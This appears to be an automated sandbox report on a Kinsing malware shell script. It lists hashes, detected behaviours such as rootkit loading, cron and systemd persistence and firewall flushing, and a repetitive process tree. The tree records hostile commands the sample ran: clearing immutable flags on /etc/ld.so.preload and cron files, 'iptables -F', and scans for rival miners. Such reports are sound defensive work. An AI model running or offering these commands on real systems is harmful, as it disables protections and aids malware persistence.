Analysis
-
max time kernel
92s -
max time network
130s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/02/2025, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh
-
Size
15KB
-
MD5
492fabefcc0ff5eaea8d33b88a00b59f
-
SHA1
67462b1ed4c17bfc373a7bc031834e7e1c811b5a
-
SHA256
6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6
-
SHA512
fc41d904d513769ee8f50c932239621de3e0f3709494609c16e3b853edb7fe32ceee89094594bbc70ded76089ad76b178b6343693c9e733992fc1e48905f3562
-
SSDEEP
384:r5JxgzLuqlH2wx2vUaQa5/eN86704s80ooJQYgykWT4yCtvUsDjdWOoJwl:trgXux7YJDj8OoJwl
Malware Config
Signatures
-
Kinsing Rootkit
Rootkit reuses the publicly available BEURK rootkit.
-
Kinsing Rootkit payload 1 IoCs
resource yara_rule behavioral4/files/fstream-19.dat family_elf_kinsing_rootkit -
Kinsing family
-
Kinsing payload 1 IoCs
resource yara_rule behavioral4/files/fstream-18.dat family_elf_kinsing_loader -
Kinsing_rootkit family
-
Modifies the dynamic linker configuration file 2 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh -
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1702 chmod 1707 chmod 1709 chmod 1715 chmod 1716 chmod 1689 chmod 1691 chmod 1700 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /etc/data/kinsing 1717 6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh -
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 718 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 1437 sudo -
Attempts to change immutable files 50 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1553 xargs 1598 sed 1600 xargs 1616 sed 1597 xargs 705 chattr 712 chattr 1491 xargs 1541 xargs 1592 sed 1613 sed 1624 xargs 1446 uname 1501 xargs 1594 xargs 1601 sed 1603 xargs 1615 xargs 1618 xargs 1625 sed 1511 xargs 1595 sed 1606 xargs 1619 sed 1480 xargs 1506 xargs 1516 xargs 1559 xargs 1667 xargs 1678 xargs 1496 xargs 1523 xargs 1547 xargs 1609 xargs 1622 sed 1627 xargs 1639 xargs 1644 xargs 714 chattr 1470 xargs 1475 xargs 1485 xargs 1528 xargs 1604 sed 1621 xargs 1683 xargs 1535 xargs 1591 xargs 1607 sed 1656 xargs -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.6L0Woi crontab File opened for modification /var/spool/cron/crontabs/tmp.0ZTlBt crontab File opened for modification /var/spool/cron/crontabs/tmp.PEeUdY crontab File opened for modification /var/spool/cron/crontabs/tmp.8N1Xu1 crontab File opened for modification /var/spool/cron/crontabs/tmp.j9oYHV crontab File opened for modification /var/spool/cron/crontabs/tmp.CDzpra crontab File opened for modification /var/spool/cron/crontabs/tmp.G58zTq crontab File opened for modification /var/spool/cron/crontabs/tmp.9U8U6x crontab File opened for modification /var/spool/cron/crontabs/tmp.mHl57f crontab File opened for modification /var/spool/cron/crontabs/tmp.N5DZWB crontab File opened for modification /var/spool/cron/crontabs/tmp.Itpi8j crontab File opened for modification /var/spool/cron/crontabs/tmp.nvnZ02 crontab File opened for modification /var/spool/cron/crontabs/tmp.S4o0bf crontab File opened for modification /var/spool/cron/crontabs/tmp.jJUkAh crontab File opened for modification /var/spool/cron/crontabs/tmp.oGurvZ crontab File opened for modification /var/spool/cron/crontabs/tmp.sl6Ozd crontab File opened for modification /var/spool/cron/crontabs/tmp.aMMhJj crontab File opened for modification /var/spool/cron/crontabs/tmp.FIpFSu crontab File opened for modification /var/spool/cron/crontabs/tmp.GTvTwk crontab File opened for modification /var/spool/cron/crontabs/tmp.jEdY3a crontab File opened for modification /var/spool/cron/crontabs/tmp.SxQVyC crontab File opened for modification /var/spool/cron/crontabs/tmp.Hz0BPR crontab File opened for modification /var/spool/cron/crontabs/tmp.WGKCFE crontab File opened for modification /var/spool/cron/crontabs/tmp.fs25Mh crontab File opened for modification /var/spool/cron/crontabs/tmp.pDVYWw crontab File opened for modification /var/spool/cron/crontabs/tmp.onfoWO crontab File opened for modification /var/spool/cron/crontabs/tmp.y7J2xH crontab File opened for modification /var/spool/cron/crontabs/tmp.aSTkHe crontab File opened for modification /var/spool/cron/crontabs/tmp.3r5RSg crontab File opened for modification /var/spool/cron/crontabs/tmp.S1D4bZ crontab File opened for modification /var/spool/cron/crontabs/tmp.7HZ1AL crontab File opened for modification /var/spool/cron/crontabs/tmp.ESHcyE crontab File opened for modification /var/spool/cron/crontabs/tmp.w5EtLU crontab File opened for modification /var/spool/cron/crontabs/tmp.rPJD15 crontab File opened for modification /var/spool/cron/crontabs/tmp.dMqgF6 crontab File opened for modification /var/spool/cron/crontabs/tmp.pnytfc crontab File opened for modification /var/spool/cron/crontabs/tmp.eeoOq0 crontab File opened for modification /var/spool/cron/crontabs/tmp.tPGQcq crontab File opened for modification /var/spool/cron/crontabs/tmp.L7SWaI crontab File opened for modification /var/spool/cron/crontabs/tmp.z8XgFh crontab File opened for modification /var/spool/cron/crontabs/tmp.6GG3LH crontab File opened for modification /var/spool/cron/crontabs/tmp.8ENOzE crontab File opened for modification /var/spool/cron/crontabs/tmp.cYTpCg crontab File opened for modification /var/spool/cron/crontabs/tmp.l2MFHR crontab File opened for modification /var/spool/cron/crontabs/tmp.lyIFkf crontab File opened for modification /var/spool/cron/crontabs/tmp.hC5Kvj crontab File opened for modification /var/spool/cron/crontabs/tmp.fZUyfg crontab File opened for modification /var/spool/cron/crontabs/tmp.8x0VqR crontab File opened for modification /var/spool/cron/crontabs/tmp.FlUxaG crontab File opened for modification /var/spool/cron/crontabs/tmp.LImRza crontab File opened for modification /var/spool/cron/crontabs/tmp.BQT4l4 crontab File opened for modification /var/spool/cron/crontabs/tmp.jEryWA crontab File opened for modification /var/spool/cron/crontabs/tmp.ciK2kV crontab File opened for modification /var/spool/cron/crontabs/tmp.rAyBoV crontab File opened for modification /var/spool/cron/crontabs/tmp.jv803s crontab File opened for modification /var/spool/cron/crontabs/tmp.nDSrjP crontab File opened for modification /var/spool/cron/crontabs/tmp.69usVB crontab File opened for modification /var/spool/cron/crontabs/tmp.9K4UVP crontab File opened for modification /var/spool/cron/crontabs/tmp.zp6Ngk crontab File opened for modification /var/spool/cron/crontabs/tmp.HvUqUh crontab File opened for modification /var/spool/cron/crontabs/tmp.U3VZ2d crontab File opened for modification /var/spool/cron/crontabs/tmp.Q8q1wk crontab File opened for modification /var/spool/cron/crontabs/tmp.BrbC5f crontab File opened for modification /var/spool/cron/crontabs/tmp.TeZMt9 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/fs/kdbus/0-system/bus systemctl File opened for reading /sys/fs/kdbus/0-system/bus systemctl -
Process Discovery 1 TTPs 12 IoCs
Adversaries may try to discover information about running processes.
pid Process 1502 ps 1507 ps 1512 ps 1635 ps 1679 ps 1492 ps 1519 ps 1524 ps 1587 ps 1640 ps 1487 ps 1497 ps -
description ioc Process File opened for reading /proc/18/cmdline pkill File opened for reading /proc/14/status pkill File opened for reading /proc/110/status ps File opened for reading /proc/6/status ps File opened for reading /proc/349/cmdline pkill File opened for reading /proc/9/cmdline pkill File opened for reading /proc/76/status ps File opened for reading /proc/filesystems crontab File opened for reading /proc/122/cmdline pkill File opened for reading /proc/220/stat ps File opened for reading /proc/110/cmdline pkill File opened for reading /proc/23/cmdline pkill File opened for reading /proc/154/cmdline pkill File opened for reading /proc/324/status ps File opened for reading /proc/8/status ps File opened for reading /proc/110/cmdline pkill File opened for reading /proc/9/stat ps File opened for reading /proc/1/cmdline pkill File opened for reading /proc/17/cmdline pkill File opened for reading /proc/72/cmdline pkill File opened for reading /proc/15/cmdline pkill File opened for reading /proc/10/status pkill File opened for reading /proc/7/stat ps File opened for reading /proc/375/cmdline pkill File opened for reading /proc/377/cmdline pkill File opened for reading /proc/349/cmdline pkill File opened for reading /proc/122/cmdline ps File opened for reading /proc/68/cmdline ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/377/stat ps File opened for reading /proc/82/cmdline pkill File opened for reading /proc/236/cmdline pkill File opened for reading /proc/375/status pkill File opened for reading /proc/37/status pkill File opened for reading /proc/7/cmdline pkill File opened for reading /proc/73/cmdline pkill File opened for reading /proc/349/status pkill File opened for reading /proc/36/cmdline pkill File opened for reading /proc/122/cmdline pkill File opened for reading /proc/121/cmdline ps File opened for reading /proc/17/status ps File opened for reading /proc/236/cmdline ps File opened for reading /proc/664/status pkill File opened for reading /proc/37/cmdline pkill File opened for reading /proc/12/cmdline pkill File opened for reading /proc/14/status pkill File opened for reading /proc/20/stat ps File opened for reading /proc/5/stat ps File opened for reading /proc/79/cmdline ps File opened for reading /proc/self/maps awk File opened for reading /proc/177/cmdline pkill File opened for reading /proc/17/cmdline pkill File opened for reading /proc/700/status pkill File opened for reading /proc/15 ls File opened for reading /proc/1473/cmdline ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/23/status ps File opened for reading /proc/664/cmdline pkill File opened for reading /proc/236/cmdline pkill File opened for reading /proc/9/status pkill File opened for reading /proc/22/status pkill File opened for reading /proc/393/status pkill File opened for reading /proc/69/status pkill File opened for reading /proc/6/stat ps -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1823 sed 1392 ls
Processes
-
/tmp/6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh/tmp/6c7dccc2dd1f572db4ef853c81f88ac291f87025ff8c8f94a7d020b5730a7fa6.sh1⤵
- Modifies the dynamic linker configuration file
- Executes dropped EXE
- Modifies systemd
PID:702 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:705
-
-
/bin/rmrm -f /etc/ld.so.preload2⤵PID:710
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵
- Attempts to change immutable files
PID:712
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:714
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:718
-
-
/bin/grepgrep exe2⤵PID:727
-
-
/bin/lsls -latrh /proc/12⤵PID:726
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:732
-
-
/bin/grepgrep exe2⤵PID:737
-
-
/bin/lsls -latrh /proc/102⤵PID:736
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:739
-
-
/bin/grepgrep exe2⤵PID:743
-
-
/bin/lsls -latrh /proc/112⤵PID:742
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:746
-
-
/bin/grepgrep exe2⤵PID:750
-
-
/bin/lsls -latrh /proc/1102⤵PID:749
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:754
-
-
/bin/grepgrep exe2⤵PID:757
-
-
/bin/lsls -latrh /proc/122⤵PID:756
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:760
-
-
/bin/grepgrep exe2⤵PID:763
-
-
/bin/lsls -latrh /proc/1212⤵PID:762
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:765
-
-
/bin/grepgrep exe2⤵PID:768
-
-
/bin/lsls -latrh /proc/1222⤵PID:767
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:771
-
-
/bin/lsls -latrh /proc/132⤵PID:773
-
-
/bin/grepgrep exe2⤵PID:774
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:776
-
-
/bin/grepgrep exe2⤵PID:779
-
-
/bin/lsls -latrh /proc/142⤵PID:778
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:781
-
-
/bin/grepgrep exe2⤵PID:784
-
-
/bin/lsls -latrh /proc/152⤵
- Reads runtime system information
PID:783
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:786
-
-
/bin/grepgrep exe2⤵PID:789
-
-
/bin/lsls -latrh /proc/1542⤵PID:788
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:791
-
-
/bin/grepgrep exe2⤵PID:794
-
-
/bin/lsls -latrh /proc/162⤵PID:793
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:796
-
-
/bin/grepgrep exe2⤵PID:799
-
-
/bin/lsls -latrh /proc/1602⤵PID:798
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:801
-
-
/bin/grepgrep exe2⤵PID:804
-
-
/bin/lsls -latrh /proc/172⤵PID:803
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:806
-
-
/bin/grepgrep exe2⤵PID:809
-
-
/bin/lsls -latrh /proc/1772⤵PID:808
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:811
-
-
/bin/grepgrep exe2⤵PID:814
-
-
/bin/lsls -latrh /proc/182⤵PID:813
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:816
-
-
/bin/grepgrep exe2⤵PID:819
-
-
/bin/lsls -latrh /proc/192⤵PID:818
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:821
-
-
/bin/grepgrep exe2⤵PID:824
-
-
/bin/lsls -latrh /proc/22⤵PID:823
-
-
